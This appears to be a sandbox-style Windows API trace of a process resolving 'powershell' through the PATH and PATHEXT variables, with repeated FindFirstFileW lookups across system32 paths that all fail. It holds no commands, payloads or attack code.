	[0416.258] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0416.258] CoTaskMemFree (pv=0x46ad10) 
	[0416.260] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0416.260] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0416.260] CoTaskMemFree (pv=0x46ad10) 
	[0416.260] CoTaskMemAlloc (cb=0x128) returned 0x3e1de0
	[0416.260] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3e1de0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0416.260] CoTaskMemFree (pv=0x3e1de0) 
	[0416.264] CoTaskMemAlloc (cb=0x20e) returned 0x3d8e30
	[0416.264] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3d8e30 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0416.264] CoTaskMemFree (pv=0x3d8e30) 
	[0416.267] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.268] SetErrorMode (uMode=0x1) returned 0x1
	[0416.271] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.279] SetErrorMode (uMode=0x1) returned 0x1
	[0416.281] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.281] SetErrorMode (uMode=0x1) returned 0x1
	[0416.281] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.288] SetErrorMode (uMode=0x1) returned 0x1
	[0416.289] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.289] SetErrorMode (uMode=0x1) returned 0x1
	[0416.643] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.650] SetErrorMode (uMode=0x1) returned 0x1
	[0416.651] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.651] SetErrorMode (uMode=0x1) returned 0x1
	[0416.651] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.658] SetErrorMode (uMode=0x1) returned 0x1
	[0416.659] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.659] SetErrorMode (uMode=0x1) returned 0x1
	[0416.659] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.667] SetErrorMode (uMode=0x1) returned 0x1
	[0416.668] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.668] SetErrorMode (uMode=0x1) returned 0x1
	[0416.668] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.675] SetErrorMode (uMode=0x1) returned 0x1
	[0416.676] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.676] SetErrorMode (uMode=0x1) returned 0x1
	[0416.676] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.966] SetErrorMode (uMode=0x1) returned 0x1
	[0416.967] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.967] SetErrorMode (uMode=0x1) returned 0x1
	[0416.967] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.976] SetErrorMode (uMode=0x1) returned 0x1
	[0416.977] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.978] SetErrorMode (uMode=0x1) returned 0x1
	[0416.978] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.985] SetErrorMode (uMode=0x1) returned 0x1
	[0416.987] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.987] SetErrorMode (uMode=0x1) returned 0x1
	[0416.987] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0416.995] SetErrorMode (uMode=0x1) returned 0x1
	[0416.996] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.997] SetErrorMode (uMode=0x1) returned 0x1
	[0416.997] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.005] SetErrorMode (uMode=0x1) returned 0x1
	[0417.006] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.006] SetErrorMode (uMode=0x1) returned 0x1
	[0417.006] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.280] SetErrorMode (uMode=0x1) returned 0x1
	[0417.282] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.282] SetErrorMode (uMode=0x1) returned 0x1
	[0417.282] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.290] SetErrorMode (uMode=0x1) returned 0x1
	[0417.291] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.291] SetErrorMode (uMode=0x1) returned 0x1
	[0417.292] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.300] SetErrorMode (uMode=0x1) returned 0x1
	[0417.301] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.301] SetErrorMode (uMode=0x1) returned 0x1
	[0417.301] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.309] SetErrorMode (uMode=0x1) returned 0x1
	[0417.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.311] SetErrorMode (uMode=0x1) returned 0x1
	[0417.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.311] SetErrorMode (uMode=0x1) returned 0x1
	[0417.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.312] SetErrorMode (uMode=0x1) returned 0x1
	[0417.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.312] SetErrorMode (uMode=0x1) returned 0x1
	[0417.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.313] SetErrorMode (uMode=0x1) returned 0x1
	[0417.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.313] SetErrorMode (uMode=0x1) returned 0x1
	[0417.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.313] SetErrorMode (uMode=0x1) returned 0x1
	[0417.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.314] SetErrorMode (uMode=0x1) returned 0x1
	[0417.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.314] SetErrorMode (uMode=0x1) returned 0x1
	[0417.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.314] SetErrorMode (uMode=0x1) returned 0x1
	[0417.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.314] SetErrorMode (uMode=0x1) returned 0x1
	[0417.315] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.315] SetErrorMode (uMode=0x1) returned 0x1
	[0417.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.315] SetErrorMode (uMode=0x1) returned 0x1
	[0417.315] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.316] SetErrorMode (uMode=0x1) returned 0x1
	[0417.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.316] SetErrorMode (uMode=0x1) returned 0x1
	[0417.316] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.316] SetErrorMode (uMode=0x1) returned 0x1
	[0417.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.317] SetErrorMode (uMode=0x1) returned 0x1
	[0417.317] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.317] SetErrorMode (uMode=0x1) returned 0x1
	[0417.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.317] SetErrorMode (uMode=0x1) returned 0x1
	[0417.317] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.317] SetErrorMode (uMode=0x1) returned 0x1
	[0417.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.318] SetErrorMode (uMode=0x1) returned 0x1
	[0417.318] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.318] SetErrorMode (uMode=0x1) returned 0x1
	[0417.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.318] SetErrorMode (uMode=0x1) returned 0x1
